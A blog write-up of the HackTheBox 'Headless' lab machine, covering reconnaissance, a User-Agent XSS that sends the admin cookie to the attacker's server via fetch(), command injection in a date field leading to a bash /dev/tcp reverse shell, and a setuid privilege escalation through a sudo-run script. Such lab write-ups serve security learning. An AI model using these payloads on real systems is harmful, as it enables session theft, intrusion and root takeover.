Open in app

Sign in

Write

Sign in

Headless machine write-up HackTheBox

Mahmoud gamal
6 min readApr 9, 2024

i tried to visit the website but it returned an error so we gonna start with simple nmap scan to see what we are dealing with i used this command :

nmap -sC -sT -sV 10.10.11.8
  • -sC to use default scripts
  • -sT to make tcp connection scan
  • -sV to enable version scan

and i found so interesting things there is two ports opend 22 and 5000 the 22 port used for ssh but i didn’t know what 5000 used for so i searched for it and i found it used for the upnp devices (printers,consoles,smart tvs,routers,etc)

now i tried to visit 10.10.11.8:5000

as you can see it’s a page with a count down and a button for questions nothing much honestly

i gonna look for any hidden paths i gonna use dirsearch but ofc use whatever you are comfortable with

dirsearch been running for about a 15 minutes but i didn’t find except support and dashboard which im not authorized to view i also looked to the page source if there is any endpoints or js files that i can look in but it was a died end

so support page it’s

i captured the request it looks pretty normal

i gonna try to submit some special characters and see if it give me any errors

as you can see we made the app angry and that’s an absolute success

there’s a something i just noticed the request we send to support have cookie parameter is_admin with encrypted value

sadly hashid said that it’s unknown hash so it’s deadend ig ?

i noticed a thing when i tried special characterless (<>) it says that it gonna send a report to the administrators to investigate usually this report gonna be on same web app or via email let’s hope it’s the same app so maybe we can steal session or any account takeover after a lot of failed attempts i found that i am stupid since there is a request been reflected in the page it maybe have an xss in it i tired to inject simple payload

<img src=x onerror=alert(document.cookie)>

in message but it didn’t work i tried user agent and pingo it worked

now we can steal admin cookies via xss it’s quite simply actually here’s the payload i used

<img src=x onerror=fetch('http://{your ip}/'+document.cookie);>

you also need receive the cookies i gonna use simple http server in python but use whatever listener you want

python3 -m http.server  80

when it get sent to the admin it will return his cookies and it worked!

as you can see we received the cookie now lets try use it in is_Admin parameter and visit the dashboard again

and we are in

as you can see we can generate health report for system health so let’s intercept the request

for all burp user don’t get offended but as you can see in zap the request contain a date and i gonna try to inject simple linux command and see if it return anything

as you can see it returned the working dir let’s try a reverseshell and remember it’s a linux machine .

i gonna use https://www.revshells.com/ and netcat as a listener

first i used this payload

sh -i >& /dev/tcp/10.10.16.90/9001 0>&1

nc listener

nc -nvlp 9001

i didn’t work and it say’s i am not authorized or smth but since we already can run some commands like echo ,ls and other i gonna try to create the payload via request

echo '#!/bin/bash' > reverse_shell.sh && echo 'sh -i >& /dev/tcp/10.10.16.90/9001 0>&1' >> reverse_shell.sh

and don’t forget to url encode it so it work

after some missing around it worked

now let’s run it and see if can get connection

absolute success

and we got the first flag

now let’s get to the privilege escalation

as you can see we are user called dvir let’s see what commands can dvir execute via sudo

you can see that he can run /usr/bin/syscheck with no password and that’s a good start let’s check it out

as you can see it’s a bash script that must run as root check some values and retrieve some information about the system but the interesting part is here

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."

it check if the file initdb.sh is running if not it run it so maybe we can modify this file to gain root access

after looking i didn’t find the file so i gonna create a new one and make it read the root flag

sadly it didn’t work idk why but after some searching i found an easier “setuid privilege escalation” you can read more about it from here https://medium.com/go-cyber/linux-privilege-escalation-with-suid-files-6119d73bc620

first we gonna create the initdb.sh file and echo chmod u+s /bin/bash in it

echo "chmod u+s /bin/bash" > initdb.sh

This command prepares the script file that will set the setuid bit for /bin/bash

then make it executable file

chmod +x initdb.sh

and gonna run syscheck

 sudo /usr/bin/syscheck

now when i run /bin/bash -p suppose to get root access

b@@m! we got root access

now the flag and done

--

--

Mahmoud gamal

Written by Mahmoud gamal

1 Follower

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams